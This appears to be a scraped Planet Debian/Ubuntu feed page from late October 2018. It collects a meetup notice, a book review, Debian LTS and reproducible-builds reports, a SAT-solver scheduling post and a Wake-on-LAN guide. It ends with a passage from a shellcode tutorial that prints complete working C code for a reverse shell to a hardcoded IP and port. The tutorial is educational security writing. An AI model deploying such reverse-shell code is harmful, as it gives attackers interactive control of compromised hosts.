You are here

Agreguesi i feed

Montreal's Debian & Stuff - November 2018

Planet Debian - Enj, 01/11/2018 - 5:00pd

November's wet, My socks are too, Away from keyboard; still on the net, Let's fix /usr/bin/$foo.

November can be a hard month in the Northen Hemisphere. It tends to be dark, rainy and cold. Montreal sure has been dark, rainy and cold lately.

That's why you should join us at our next Debian & Stuff later this month. Come by and work on Debian-related stuff - or not! Hanging out and chatting with folks is also perfectly fine. As always, everyone's welcome.

The date hasn't been decided yet, so be sure to fill out this poll before November 10th. This time we'll be hanging out at Koumbit.

What else can I say; if not for the good company, the bad poutine from the potato shack next door or the nice craft beer from the very hipster beer shop a little bit further down the street, you should drop by to keep November from creeping in too far.

Louis-Philippe Véronneau https://veronneau.org/ Louis-Philippe Véronneau

Review: In Pursuit of the Traveling Salesman

Planet Debian - Enj, 01/11/2018 - 4:25pd

Review: In Pursuit of the Traveling Salesman, by William J. Cook

Publisher: Princeton University Copyright: 2012 ISBN: 0-691-15270-5 Format: Kindle Pages: 272

In Pursuit of the Traveling Salesman is a book-length examination of the traveling salesman problem (TSP) in computer science, written by one of the foremost mathematicians working on solutions to the TSP. Cook is Professor of Applied Mathematics and Statistics at Johns Hopkins University and is one of the authors of the Concorde TSP Solver.

First, a brief summary of the TSP for readers without a CS background. While there are numerous variations, the traditional problem is this: given as input a list of coordinates on a two-dimensional map representing cities, construct a minimum-length path that visits each city exactly once and then returns to the starting city. It's famous in computer science in part because it's easy to explain and visualize but still NP-hard, which means that not only do we not know of a way to exactly solve this problem in a reasonable amount of time for large numbers of cities, but also that a polynomial-time solution to the TSP would provide a solution to a vast number of other problems. (For those familiar with computability theory, the classic TSP is not NP-complete because it's not a decision problem and because of some issues with Euclidean distances, but when stated as a graph problem and converted into a decision problem by, for example, instead asking if there is a solution with length less than n, it is NP-complete.)

This is one of those books where the quality of the book may not matter as much as its simple existence. If you're curious about the details of the traveling salesman problem specifically, but don't want to read a lot of mathematics and computer science papers, algorithm textbooks, or books on graph theory, this book is one of your few options. Thankfully, it's also fairly well-written. Cook provides a history of the problem, a set of motivating problems (the TSP doesn't come up as much and isn't as critical as some NP-complete problems, but optimal tours are still more common than one might think), and even a one-chapter tour of the TSP in art. The bulk of the book, though, is devoted to approximation methods, presented in roughly chronological order of development.

Given that the TSP is NP-hard, we obviously don't know a good exact solution, but I admit I was a bit disappointed that Cook spent only one chapter exploring the exact solutions and explaining to the reader what makes the problem difficult. Late in the book, he does describe the Held-Karp dynamic programming algorithm that gets the work required for an exact solution down to exponential in n, provides a basic introduction to complexity theory, and explains that the TSP is NP-complete by reduction from the Hamiltonian path problem, but doesn't show the reduction of 3SAT to Hamiltonian paths. Since my personal interest ran a bit more towards theory and less towards practical approximations, I would have appreciated a bit more discussion of the underlying structure of the problem and why it's algorithmically hard. (I did appreciate the explanation of why it's not clear whether the general Euclidean TSP is even in NP due to problems with square roots, though.)

That said, I suppose there isn't as much to talk about in exact solutions (the best one we know dates to 1962) and much more to talk about in approximations, which is where Cook has personally spent his time. That's the topic of most of this book, and includes a solid introduction to the basic concept of linear programming (a better one than I ever got in school) and some of its other applications, as well as other techniques (cutting planes, branch-and-bound, and others). The math gets a bit thick here, and Cook skips over a lot of the details to try to keep the book suitable for a general audience, so I can't say I followed all of it, but it certainly satisfied my curiosity about practical approaches to the TSP. (It also made me want to read more about linear programming.)

If you're looking for a book like this, you probably know that already, and I can reassure you that it delivers what it promises and is well-written and approachable. If you aren't already curious about a brief history of practical algorithms for one specific problem, I don't think this book is sufficiently compelling to worth seeking out anyway. This is not a general popularization of interesting algorithms (see Algorithms to Live By if you're looking for that), or (despite Cook's efforts) particularly approachable if this is your first deep look at computer algorithms. It's a niche book that delivers on its promise, but probably won't convince you the topic is interesting if you don't see the appeal.

Rating: 7 out of 10

Russ Allbery https://www.eyrie.org/~eagle/ Eagle's Path

Debian LTS work, October 2018

Planet Debian - Mër, 31/10/2018 - 11:26md

I was assigned 15 hours of work by Freexian's Debian LTS initiative and carried over 4 hours from September. I worked all 19 hours.

I released security updates for the linux (DLA 1529-1) and linux-4.9 (DLA 1531-1) packages. I prepared and released another stable update for Linux 3.16 (3.16.60), but have not yet included this in a Debian upload. I also released a security update for libssh (DLA 1548-1).

Ben Hutchings https://www.decadent.org.uk/ben/blog Better living through software

RHL'19 St-Cergue, Switzerland, 25-27 January 2019

Planet Debian - Mër, 31/10/2018 - 10:06md

(translated from original French version)

The Rencontres Hivernales du Libre (RHL) (Winter Meeting of Freedom) takes place 25-27 January 2019 at St-Cergue.

Swisslinux.org invites the free software community to come and share workshops, great meals and good times.

This year, we celebrate the 5th edition with the theme «Exploit».

Please think creatively and submit proposals exploring this theme: lectures, workshops, performances and other activities are all welcome.

RHL'19 is situated directly at the base of some family-friendly ski pistes suitable for beginners and more adventurous skiers. It is also a great location for alpine walking trails.

Why, who?

RHL'19 brings together the forces of freedom in the Leman basin, Romandy, neighbouring France and further afield (there is an excellent train connection from Geneva airport). Hackers and activists come together to share a relaxing weekend and discover new things with free technology and software.

If you have a project to present (in 5 minutes, an hour or another format) or activities to share with other geeks, please send an email to rhl-team@lists.swisslinux.org or submit it through the form.

If you have any specific venue requirements please contact the team.

You can find detailed information on the event web site.

Please ask if you need help finding accommodation or any other advice planning your trip to the region.

Daniel.Pocock https://danielpocock.com/tags/debian DanielPocock.com - debian

Daniel Pocock: RHL'19 St-Cergue, Switzerland, 25-27 January 2019

Planet Ubuntu - Mër, 31/10/2018 - 10:06md

(translated from original French version)

The Rencontres Hivernales du Libre (RHL) (Winter Meeting of Freedom) takes place 25-27 January 2019 at St-Cergue.

Swisslinux.org invites the free software community to come and share workshops, great meals and good times.

This year, we celebrate the 5th edition with the theme «Exploit».

Please think creatively and submit proposals exploring this theme: lectures, workshops, performances and other activities are all welcome.

RHL'19 is situated directly at the base of some family-friendly ski pistes suitable for beginners and more adventurous skiers. It is also a great location for alpine walking trails.

Why, who?

RHL'19 brings together the forces of freedom in the Leman basin, Romandy, neighbouring France and further afield (there is an excellent train connection from Geneva airport). Hackers and activists come together to share a relaxing weekend and discover new things with free technology and software.

If you have a project to present (in 5 minutes, an hour or another format) or activities to share with other geeks, please send an email to rhl-team@lists.swisslinux.org or submit it through the form.

If you have any specific venue requirements please contact the team.

You can find detailed information on the event web site.

Please ask if you need help finding accommodation or any other advice planning your trip to the region.

Free software activities in October 2018

Planet Debian - Mër, 31/10/2018 - 4:47md

Here is my monthly update covering what I have been doing in the free software world during October 2018 (previous month):

We intend to maintain changes to these modules under their original open source licenses and applying only free and open fixes and updates. You can find out more at goodformcode.com.

  • My activities as the current Debian Project Leader are covered in my monthly "Bits from the DPL" email to the debian-devel-announce mailing list.

  • I created Github-esque ribbons to display on Salsa-hosted websites. (Salsa being the collaborative development server for Debian and is the replacement for the now-deprecated Alioth service.)

  • Started a highly work-in-progress "Debbugs Enhancement Suite" Chrome browser extension to enhance various parts of the bugs.debian.org web interface.

  • Even more hacking on the Lintian static analysis tool for Debian packages:

    • New features:

      • Warn about packages that use PIUPARTS_* in maintainer scripts. (#912040)
      • Check for packages that parse /etc/passwd in maintainer scripts. (#911157)
      • Emit a warning for packages that do not specify Build-Depends-Package in symbol files. (#911451)
      • Check for non-Python files in top-level Python module directories. [...]
      • Check packages missing versioned dependencies on init-system-helpers. (#910594)
      • Detect calls to update-inetd(1) that use --group without --add, etc. (#909511)
      • Check for packages that encode a Python version number in their source package name. [...]
    • Bug fixes:

    • Misc:

      • Also show the maintainer name on the tag-specific reporting HTML. [...]
      • Tidy a number of references regarding the debhelper-compat virtual package. [...]
Reproducible builds

Whilst anyone can inspect the source code of free software for malicious flaws almost all software is distributed pre-compiled to end users.

The motivation behind the Reproducible Builds effort is to ensure no flaws have been introduced during this compilation process by promising identical results are always generated from a given source, thus allowing multiple third-parties to come to a consensus on whether a build was compromised.

This month:

  • I attended the Tandon School of Engineering (part of New York University) to speak and work with students from the Application Security course on the topic of reproducible builds.

  • Wrote and forwarded patch for Fontconfig to ensure the cache filenames are determinstic. [...]

  • I sent two previously-authored patches for GNU mtools to ensure the Debian Installer images could become reproducible. (1 & 2)

  • Submitted 11 Debian patches to fix reproducibility issues in fast5, libhandy, lmfit-py, mp3fs, opari2, pjproject, radon, sword, syndie, wit & zsh-antigen. I also submitted an upstream pull request for python-changelog.

  • Made a large number of changes to our website, including adding step-by-step instructions and screenshots on how to signup to our project on Salsa and migrating the TimestampsProposal page on the Debian Wiki to our website.

  • Fixed an issue in disorderfs — our FUSE-based filesystem that deliberately introduces non-determinism into directory system calls in order to flush out reproducibility issues — where touch -m and touch -a were not working as expected (#911281). In addition, ensured that failing an XFail test should in-itself be a failure [...].

  • Made the following changes to diffoscope, our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues to:

    • Add support for comparing OCaml files via ocamlobjinfo. (#910542)

    • Add support for comparing PDF metadata using PyPDF2. (#911446)

    • Support gnumeric 1.12.43. [...]

    • Use str.startswith(...) over str.index(...) == 0 in the Macho comparator to prevent tracebacks if text cannot be found on the line. (#910540).

    • Add note on how to regenerate debian/tests/control.in and regenerate debian/tests/control with no material changes to add the regeneration comment itself. (1, 2)

    • Prevent test failures when running under stretch-backports by checking the OCaml version number. (#911846)

    • I also added a Salsa ribbon to the diffoscope.org website. [...]

  • Categorised a huge number of packages and issues in the Reproducible Builds "notes" repository and kept isdebianreproducibleyet.com up to date [...].

  • Worked on publishing our weekly reports. (#180, #181, #182 & #183)

  • Lastly, I fixed an issue in our Jenkins-based testing framework that powers tests.reproducible-builds.org to suppress some warnings from the cryptsetup initramfs hook which were causing some builds to be marked as "unstable". [...]


Debian


Debian bugs & patches filed
  • debbugs: Correct "favicon" location in <link/> HTML header. (#912186)

  • ikiwiki: "po" plugin can insert raw file contents with [[!inline]] directives. (#911356)

  • kitty: Please update homepage. (#911848)

  • pipenv: Bundles a large number of third-party libraries. (#910107)

  • mailman: Please include List-Id header on confirmation mails. (#910378)

  • fswatch: Clarify Files-Excluded entries. (#910330)

  • fuse3: Please obey nocheck build profile. (#910029)

  • gau2grid: Please add a non-boilerplate long description. (#911532)

  • hiredis: Please backport to stretch-backports. (#911732)

  • Please remove unnecessary overrides in fuse3 (#910030), puppet-module-barbican (#910374), python-oslo.vmware (#910011) & python3-antlr3(#910012)

  • python3-pypdf2: Python 3.x package ships non-functional Python 2.x examples. (#911649)

  • mtools: New upstream release. (#912285)

I also a filed requests with the stable release managers to update lastpass-cli (#911767) and python-django (#910821).


Debian LTS

This month I have worked 18 hours on Debian Long Term Support (LTS) and 12 hours on its sister Extended LTS project.

  • Multiple "frontdesk" shifts, triaging upstream CVEs, liasing with the Security Team, etc.

  • Issued DLA 1528-1 to prevent a denial-of-service (DoS) vulnerability in strongswan, a virtual private network (VPN) client and server where verification of an RSA signature with a very short public key caused an integer underflow in a length check that resulted in a heap buffer overflow.

  • Issued DLA 1547-1 for the Apache PDFBox library to fix a potential DoS issue where a malicious file could have triggered an extremely long running computation when parsing the PDF page tree.

  • Issued DLA 1550-1 for src:drupal7 to close remote code execution and an external URL injection exploit in the Drupal web-based content management framework as part of Drupal's SA-CORE-2018-006 security release.

  • Issued ELA-49-1 for the Adplug sound library to fix potential DoS attack due to double-free vulnerability.


Uploads
  • redis:

    • 5.0~rc5-2 — Use the Debian hiredis library now that #907259 has landed. (#907258)
    • 5.0.0-1 — New upstream release.
    • 5.0.0-2 — Update patch to sentinel.conf to ensure the correct runtime PID file location (#911407), listen on ::1 interfaces too for redis-sentinel to match redis-server, & run the new LOLWUT command in the autopkgtests.
  • python-django:

    • 1.11.16-1 — New upstream bugfix release.
    • 1.11.16-2 — Fix some broken README.txt symlinks. (#910120)
    • 1.11.16-3 — Default to supporting Spatialite 4.2. (#910240)
    • 2.1.2-1 — New upstream security release.
    • 2.1.2-2 — Default to supporting Spatialite 4.2. (#910240)
  • libfiu:

  • 0.96-5 — Apply patch from upstream to write fiu_ctrl.py atomically to avoid a.parallel build failure. (#909843)

  • 0.97-1 — New upstream release.
  • 0.97-2 — Mangle return offset sizes for 64-bit variants to prevent build failures on 32-bit architectures. (#911733)

  • adminer (4.6.3-2) — Use continue 2 to avoid a switch/continue warning in PHP 7.3, thus preventing an autopkgtest regression. (#911825)

  • bfs (1.2.4-1) — New upstream release.

  • django-auto-one-to-one (3.1.1-1) — New upstream release.

  • lastpass-cli (1.3.1-5) — Add ca-certificates to Depends.

  • python-redis (2.10.6-5) — Fix debian/watch file.

  • python-daiquiri (1.5.0-1) — New upstream release.


I also sponsored uploads of elpy (1.25.0-1) and hiredis (0.14.0-1).

FTP Team


As a Debian FTP assistant I ACCEPTed 95 packages: barrier, cct, check-pgactivity, cloudkitty-dashboard, cmark-gfm, eclipse-emf, eclipse-jdt-core, eclipse-platform-team, eclipse-platform-ua, eclipse-platform-ui, eos-sdk, equinox-p2, fontcustom, fonts-fork-awesome, fswatch, fuse3, gau2grid, gitlab, glom, grapefruit, grub-cloud, gsequencer, haskell-base-compat-batteries, haskell-invariant, haskell-parsec-numbers, haskell-reinterpret-cast, haskell-resolv, haskell-shelly, haskell-skylighting-core, haskell-wcwidth, hollywood, intelhex, javapoet, libgpg-error, libjsoncpp, libnbcompat, lintian-brush, llvm-toolchain-snapshot, mando, mat2, mini-httpd-run, modsecurity, mtree-netbsd, neutron-tempest-plugin, ngspice, openstack-cluster-installer, pg-checksums, pg-cron, pg-dirtyread, pg-qualstats, pg-repack, pg-similarity, pg-stat-kcache, pgaudit, pgextwlist, pgfincore, pgl-ddl-deploy, pgmemcache, pgpool2, pgrouting, pgsql-ogr-fdw, pgstat, pipenv, postgresql-hll, postgresql-plproxy, postgresql-plsh, puppet-module-barbican, puppet-module-icann-quagga, puppet-module-icann-tea, puppet-module-rodjek-logrotate, pykwalify, pyocd, python-backports.csv, python-fastfunc, python-httptools, python-redmine, python-tld, python-yaswfp, python3-simpletal, r-cran-eaf, r-cran-emoa, r-cran-ggally, r-cran-irace, r-cran-parallelmap, r-cran-popepi, r-cran-pracma, r-cran-spp, radon, rust-semver-parser-0.7, syndie, unicycler, vitetris, volume-key, weston & zram-tools.

I additionally filed 14 RC bugs against packages that had potentially-incomplete debian/copyright files against fontcustom, fuse3, intelhex, libnbcompat, mat2, modsecurity, mtree-netbsd, puppet-module-barbican, python-redmine, r-cran-eaf, r-cran-emoa, r-cran-pracma, radon & syndie.

Chris Lamb https://chris-lamb.co.uk/blog/category/planet-debian lamby: Items or syndication on Planet Debian.

Lubuntu Blog: Disco Dingo: The development cycle has started!

Planet Ubuntu - Mër, 31/10/2018 - 4:16md
The development cycle for the Disco Dingo (which will be the codename for the 19.04 release) has started for the Lubuntu team! Translated into: español UPDATE: Daily images are now up, and are available on our downloads page, for the adventurous. Also, an update to Perl 5.28 is being done prior to opening as well. […]

SAT solvers for fun and fairness

Planet Debian - Mar, 30/10/2018 - 10:55md

Trøndisk 2018, the first round of the Norwegian ultimate series (the frisbee sport, not the fighting style) is coming up this weekend! Normally that would mean that I would blog something about all the new and exciting things we are doing with Nageru for the stream, but for now, I will just point out that the stream is on plastkast.no and will be live from 0945–1830 CET on Saturday (group stage) and 1020–1450 (playoffs) on Sunday.

Instead, I wanted to talk about a completely different but interesting subproblem we had to solve; how do you set up a good schedule for the group stages? There are twelve teams, pre-seeded and split into two groups (call them A0–A5 and B0–B5) that are to play round-robin, but there are only two fields—and only one of them is streamed. You want a setup that maximizes fairness in the sense that people get adequate rest between matches, and also more or less equal number of streamed games. Throw in that one normally wants the more exciting games last, and it starts to get really tricky to make something good by hand. Could we do it programmatically?

My first thought was that since this is all about the ordering, it sounded like a variant of the infamous travelling salesman problem. It's well-known that TSP is NP-hard (or NP-complete, but I won't bother with the details), but there are excellent heursitic implementations in practice. In particular, I had already used OR-Tools, Google's optimization toolkit, to solve TSP problems in the past; it contains a TSP solver that can deal with all sorts of extra details, like multiple agents to travel (in our case, multiple fields), subconstraints on ordering and so on. (OR-Tools probably doesn't contain the best TSP solver in the world—there are specialized packages that do even better—but it's much better than anything I could throw together myself.)

However, as I tried figuring out something, and couldn't quite get it to fit (there are so many extra nonlocal constraints), I saw that the OR-Tools documentation had a subsection on scheduling problems. It turns out this kind of scheduling can be represented as a so-called SAT (satisfiability) problem, and OR-Tools also has a SAT solver. (SAT, in its general forms, is also NP-hard, but again, there are great heuristics.) I chose the Python frontend, which probably wasn't the best idea in the world (it's poorly documented, and I do wonder when Python will take the step into the 90s and make spelling errors in variables into compile-time errors instead of throwing a runtime exception four hours into a calculation), but that's what the documentation used, and the backend is in C++ anyway, so speed doesn't matter.

The SAT solver works by declaring variables and various constraints between them, and then asking the machine to either come up with a solution that fits, or to prove that it's not possible. Let's have a look of some excerpts to get a feel for how it all works:

We know we have 15 rounds, two fields on each, and every field should contain a match. So let's generate 30 such variables, each containing a match number (we use the convention that match 0, 2, 4, 6, etc. are on the stream field and 1, 3, 5, 7, etc. are played in parallel on the other field):

matchnums = [] for match_idx in range(num_matches): matchnums.append(model.NewIntVar(0, num_matches - 1, "matchnum%d" % (match_idx)))

So this is 30 variables, and each go from 0 to 29, inclusive. We start a fairly obvious constraint; we can only play each match once:

model.AddAllDifferent(matchnums)

The SAT solver might make this into a bunch of special constraints underneath, or it might not. We don't care; it's abstracted away for us.

Now, it's not enough to just find any ordering—after all, we want to find an ordering with some constraints. However, the constraints are rarely about the match numbers, but more about the teams that play in those matches. So we'll need some helper variables. For instance, it would be interesting to know which teams play in each match:

home_teams = [] away_teams = [] for match_idx in range(num_matches): home_teams.append(model.NewIntVar(0, num_teams - 1, "home_team_match%i" % (match_idx))) away_teams.append(model.NewIntVar(0, num_teams - 1, "away_team_match%i" % (match_idx))) model.AddElement(matchnums[match_idx], home_teams_for_match_num, home_teams[match_idx]) model.AddElement(matchnums[match_idx], away_teams_for_match_num, away_teams[match_idx])

AddElement() here simply is an indexing operation; since there's no difference between home and away teams for us, we've just pregenerated all the matches as A0 vs. A1, A0 vs. A2, etc. up until A4 vs. A6, A5 vs. A6 and then similarly for the other gruop. The “element” constraint makes sure that e.g. home_team_match0 = home_teams_for_match_num[matchnum0]. Note that even though I think of this is as an assignment where the home team for match 0 follows logically from which match is being played as match 0, it is a constraint that goes both ways; the solver is free to do inference that way, or instead first pick the home team and then deal with the consequences for the match number. (E.g., if it picks A5 as the home team, the match number most certainly needs to be 14, which corresponds to A5–A6.)

We're not quite done with the helpers yet; we want to explode these variables into booleans:

home_team_in_match_x_is_y = [[ model.NewBoolVar('home_team_in_match_%d_is_%d' % (match_idx, team_idx)) for team_idx in range(num_teams) ] for match_idx in range(num_matches)] for match_idx in range(num_matches): model.AddMapDomain(matchnums[match_idx], match_x_has_num_y[match_idx])

and similarly for away team and match number.

So now we have a bunch of variables of the type “is the home team in match 6 A4 or not?”. Finally we can make some interesting constraints! For instance, we've decided already that the group finals (A0–A1 and B0–B1) should be the last two matches of the day, and on the stream field:

model.AddBoolOr([match_x_has_num_y[28][0], match_x_has_num_y[28][15]]) model.AddBoolOr([match_x_has_num_y[26][0], match_x_has_num_y[26][15]])

This is a hard constraint; we don't have a solution unless match 0 and match 15 are the last two (and we earlier said that they must be different).

We're going to need even more helper variables now. It's useful to know whether a team is playing at all in a given round; that's the case if they are the home or away team on either field:

plays_in_round = {} for team_idx in range(num_teams): plays_in_round[team_idx] = {} for round_idx in range(num_rounds): plays_in_round[team_idx][round_idx] = model.NewBoolVar('plays_in_round_t%d_r%d' % (team_idx, round_idx)) model.AddMaxEquality(plays_in_round[team_idx][round_idx], [ home_team_in_match_x_is_y[round_idx * 2 + 0][team_idx], home_team_in_match_x_is_y[round_idx * 2 + 1][team_idx], away_team_in_match_x_is_y[round_idx * 2 + 0][team_idx], away_team_in_match_x_is_y[round_idx * 2 + 1][team_idx]])

Now we can establish a few other very desirable properties; in particular, each team should never need to play two matches back-to-back:

for round_idx in range(num_rounds - 1): for team_idx in range(num_teams): model.AddBoolOr([plays_in_round[team_idx][round_idx].Not(), plays_in_round[team_idx][round_idx + 1].Not()])

Note that there's nothing here that says the same team can't be assigned to play on both fields at the same time! However, this is taken care of by some constraints on the scheduling that I'm not showing for brevity (in particular, we established that each round must have exactly one game from group A and one from group B).

Now we're starting to get out of the “hard constraint” territory and more into things that would be nice. For this, we need objectives. One such objective is what I call ”tiredness”; playing matches nearly back-to-back (ie., game - rest - game) should have a penalty, and the solution should try to avoid it.

tired_matches = [] for round_idx in range(num_rounds - 2): for team_idx in range(num_teams): tired = model.NewBoolVar('team_%d_is_tired_in_round_%d' % (team_idx, round_idx)) model.AddMinEquality(tired, [plays_in_round[team_idx][round_idx], plays_in_round[team_idx][round_idx + 2]]) tired_matches.append(tired) sum_tiredness = sum(tired_matches)

So here we have helper variables that are being set to the minimum (effectively a logical AND) of “do I play in round N” and “do I play in round N + 2”. Tiredness is simply a sum of those 0–1 variables, which we can seek to minimize:

model.Minimize(sum_tiredness)

You may wonder how we went from a satisfiability problem to an optimization problem. Conceptually, however, this isn't so hard. Just ask the solver to find any solution, e.g. something with sum_tiredness 20. Then simply add a new constraint saying sum_tiredness <= 19 and ask for a re-solve (or continue). Eventually, the solver will either come back with a better solution (in which case you can tighten the constraint further), or the message that you've asked for something impossible, in which case you know you have the optimal solution. (I have no idea whether modern SAT solvers actually work this way internally, but again, conceptually it's simple.)

As an extra bonus, you do get incrementally better solutions as you go. These problems are theoretically very hard—in fact, I let it run for fun for a week now, and it's still not found an optimal solution—and in practice, you just take some intermediate solution that is “good enough”. There are always constraints that you don't bother adding to the program anyway, so there's some eyeballing involved, but still feels like a more fair process than trying to nudge it by hand.

We had many more objectives, some of them contradictory (e.g., games between more closely seeded opponents are more “exciting”, and should be put last—but they should also be put on the stream, so do you put them early on the stream field or late on the non-stream field?). It's hard to weigh all the factors against each other, but in the end, I think we ended up with something pretty nice. Every team gets to play two or three times (out of five) on the stream, only one team needs to be “tired” twice (and I checked; if you ask for a hard maximum of once for every team, it comes back pretty fast as infeasible), many of the tight matches are scheduled near the end… and most importantly, we don't have to play the first matches while I'm still debugging the stream. :-)

You can see final schedule here. Good luck to everyone, and consider using a SAT solver next time you have a thorny scheduling problem!

Steinar H. Gunderson http://blog.sesse.net/ Steinar H. Gunderson

Enabling Wake-on-Lan with the N34 Mini PC

Planet Debian - Mar, 30/10/2018 - 8:58md

There is a room at the top of my house which was originally earmarked for storage (the loft is full of insulation rather than being a useful option). Then I remembered I still had my pico projector and it ended up as a cinema room as well. The pico projector needs really low light conditions with a long throw, so the fact the room only has a single small window is a plus.

I bought an “N34” mini PC to act as a media player - I already had a spare DVB-T2 stick to Freeview enable things, and the Kodi box downstairs has all my DVDs stored on it for easy streaming. It’s a Celeron N3450 based box with 4G RAM and a 32GB internal eMMC (though I’m currently running off an SD card because that’s what I initially used to set it up and I haven’t bothered to copy it onto the internal device yet). My device came from Amazon and is branded “Kodlix” (whose website no longer works) but it appears to be the same thing as the Beelink AP34.

Getting Linux onto it turned out to be a hassle. GRUB does not want to play with the EFI BIOS; it can be operated sometimes if manually called from the EFI Shell, but it does not work as the default EFI image to load. Various forum posts recommended the use of rEFInd, which mostly works fine.

Other than that Debian Stretch worked without problems. I had to pull in a backports kernel in order to make the DVB-T2 stick work properly, but the hardware on the N34 itself was all supported out of the box.

The other issue was trying to get Wake-on-Lan to work. The room isn’t used day to day so I want to be able to tie various pieces together with home automation such that I can have everything off by default and a scene configured to set things up ready for use. The BIOS has an entry for Wake-on-Lan, ethtool reported Supports Wake-on: g which should mean MagicPacket wakeup was enabled, but no joy. Looking at /proc/acpi/wakeup gave:

/proc/acpi/wakeup contents Device S-state Status Sysfs node HDAS S3 *disabled pci:0000:00:0e.0 XHC S3 *enabled pci:0000:00:15.0 XDCI S4 *disabled BRCM S0 *disabled RP01 S4 *disabled PXSX S4 *disabled RP02 S4 *disabled PXSX S4 *disabled RP03 S4 *disabled pci:0000:00:13.0 PXSX S4 *disabled pci:0000:01:00.0 RP04 S4 *disabled PXSX S4 *disabled RP05 S4 *disabled PXSX S4 *disabled RP06 S4 *disabled pci:0000:00:13.3 PXSX S4 *disabled pci:0000:02:00.0 PWRK S4 *enabled platform:PNP0C0C:00

pci:0000:01:00.0 is the network card:

01:00.0 Ethernet controller [0200]: Realtek […] Ethernet Controller [10ec:8168] (rev 0c)

I need this configured to allow wakeups which apparently is done via sysfs these days:

echo enabled > /sys/bus/pci/devices/0000\:01\:00.0/power/wakeup

This has to be done every boot so I just tied it into /etc/network/interfaces.

All of this then enables Home Assistant to control the Kodi box:

Home Assistant Kodi WoL configuration wake_on_lan: media_player: - platform: kodi name: Kodi (Cinema) host: kodi-cinema.here port: 8000 username: kodi password: !secret kodi_cinema_pass enable_websocket: false turn_on_action: service: wake_on_lan.send_magic_packet data: mac: 84:39:be:11:22:33 broadcast_address: 192.168.0.2 turn_off_action: service: media_player.kodi_call_method data: entity_id: media_player.kodi_cinema method: System.Shutdown

My Home Assistant container sits on a different subnet to the media box, and I found that the N34 wouldn’t respond to a Wake-on-Lan packet to the broadcast MAC address. So I’ve configured the broadcast_address for Home Assistant to be the actual IP of the media box, allowed UDP port 9 (discard) through on the firewall and statically nailed the ARP address of the media box on the router, so it transmits the packet with the correct destination MAC:

ip neigh change 192.168.0.2 lladdr 84:39:be:11:22:33 nud permanent dev eth0

I’ve still got some other bits to glue together (like putting the pico projector on a SonOff), but this gets me started on that process.

(And yes, the room is a bit cosier these days than when that photograph was taken.)

Jonathan McDowell https://www.earth.li/~noodles/blog/ Noodles' Emptiness

David Tomaschik: Understanding Shellcode: The Reverse Shell

Planet Ubuntu - Mar, 30/10/2018 - 8:00pd

A recent conversation with a coworker inspired me to start putting together a series of blog posts to examine what it is that shellcode does. In the first installment, I’ll dissect the basic reverse shell.

First, a couple of reminders: shellcode is the machine code that is injected into the flow of a program as the result of an exploit. It generally must be position independent as you can’t usually control where it will be loaded in memory. A reverse shell initiates a TCP connection from the compromised host back to a host under the control of the attacker. It then launches a shell with which the attacker can interact.

Reverse Shell in C

Let’s examine a basic reverse shell in C. Error handling is elided, both for the space in this post, and because most shellcode is not going to have error handling.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> void reverse_shell() { /* Allocate a socket for IPv4/TCP (1) */ int sock = socket(AF_INET, SOCK_STREAM, 0); /* Setup the connection structure. (2) */ struct sockaddr_in sin; sin.sin_family = AF_INET; sin.sin_port = htons(4444); /* Parse the IP address (3) */ inet_pton(AF_INET, "192.168.22.33", &sin.sin_addr.s_addr); /* Connect to the remote host (4) */ connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)); /* Duplicate the socket to STDIO (5) */ dup2(sock, STDIN_FILENO); dup2(sock, STDOUT_FILENO); dup2(sock, STDERR_FILENO); /* Setup and execute a shell. (6) */ char *argv[] = {"/bin/sh", NULL}; execve("/bin/sh", argv, NULL); } Reverse Shell Steps

As can be seen, there are approximately 6 steps in setting up a reverse shell. Once they are understood, this can be converted to proper shellcode.

  1. First we need to allocate a socket structure in the kernel with a call to socket. This is a wrapper for a system call (since it has effects in kernel space). On x86, this wraps a system call called socketcall, which is a single entry point for dispatching all socket-related system calls. On x86-64, the different socket system calls are actually distinct system calls, so this will call the socket system call. It needs to know the address family (AF_INET for IPv4) and the socket type (SOCK_STREAM for TCP, it would be SOCK_DGRAM for UDP). This returns an integer that is a file descriptor for the socket.
  2. Next, we need to setup a struct sockaddr_in, which includes the family (AF_INET again), and the port number in network byte order (big-endian).
  3. We also need to put the IP address into the structure. inet_pton can parse a string form into the struct. In a struct sockaddr_in, this is a 4 byte value, again in network byte order.
  4. We now have the full structure setup, so we can initiate a connection to the remote host using the already-created socket. This is done with a call to connect. Like socket, this is a wrapper for the socketcall system call on x86, and for a connect system call on x86-64.
  5. We want the shell to use our socket when it is handling standard input/output (stdio) functions. To do this, we duplicate the file descriptor from the socket to each of STDIN, STDOUT, STDERR. Like so many, dup2() is a thin wrapper around a system call.
  6. Finally, we setup the arguments for our shell, and launch it with execve, yet another system call. This one will replace the current binary image with the targeted binary (/bin/sh) and then execute it from the entry point. It will execute with its standard input, output, and error connected to the network socket.
Why not shellcode in C?

So, if we have a working function, why can’t we just use that as shellcode? Well, even if we compile position independent code (-pie -fPIE in gcc), this code will still have many library calls in it. In a normal program, this is no problem, as it will be linked with the C library and run fine. However, this relies on the loader doing the right thing, including the placement of the PLT and GOT. When we inject shellcode, we only inject the machine code, and don’t include any data areas necessary for the location of the GOT.

What about statically linking the C library to avoid all these problems? While that has the potential to work, any constants (like the strings for the IP address and the shell path) will be located in a different section of the binary, and so the code will be unable to reference those. (Unless we inject that section as well and fixup the relative addresses, but in that case, the complexity of our loader approaches the complexity of our entire shellcode.)

Reverse Shell in x86

My shellcode below will be written with the intent of being as clear as possible as a learning instrument. Consequently, it is neither the shortest possible shellcode, nor is it free of “bad characters” (null bytes, newlines, etc.). It is also written as NASM assembly.

